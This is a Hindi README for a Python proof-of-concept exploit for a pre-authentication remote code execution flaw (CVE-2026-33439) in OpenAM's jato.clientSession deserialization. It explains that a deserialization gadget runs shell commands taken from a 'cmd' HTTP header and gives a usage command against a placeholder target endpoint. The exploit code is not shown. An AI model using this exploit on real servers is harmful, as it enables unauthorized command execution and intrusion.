
OpenAM में jato.clientSession डीसेरिएलाइज़ेशन के माध्यम से प्री-ऑथेंटिकेशन RCE के लिए CVE-2026-33439 का Python PoC
jato.clientSession डीसेरिएलाइज़ेशन में OpenAM प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन भेद्यता के लिए स्टैंडअलोन Python प्रूफ ऑफ कॉन्सेप्ट।
एम्बेडेड शेडेड Click/Xalan गैजेट cmd HTTP हेडर से एक शेल कमांड पढ़ता है और उसका आउटपुट HTTP रिस्पॉन्स में लौटाता है। किसी बाहरी Python पैकेज, Java रनटाइम, या JAR फ़ाइलों की आवश्यकता नहीं है।
python3 exploit.py \
--url https://target.example/openam/ui/PWResetUserValidation \
'id'
वैकल्पिक आर्ग्युमेंट:
--timeout SECONDS Request timeout (default: 15)
--proxy URL HTTP proxy, for example http://127.0.0.1:8080
--verify-tls Enable TLS certificate verification
केवल उन सिस्टमों के विरुद्ध उपयोग करें जिनके आप स्वामी हैं या जिनका परीक्षण करने के लिए आपको स्पष्ट रूप से अधिकृत किया गया है।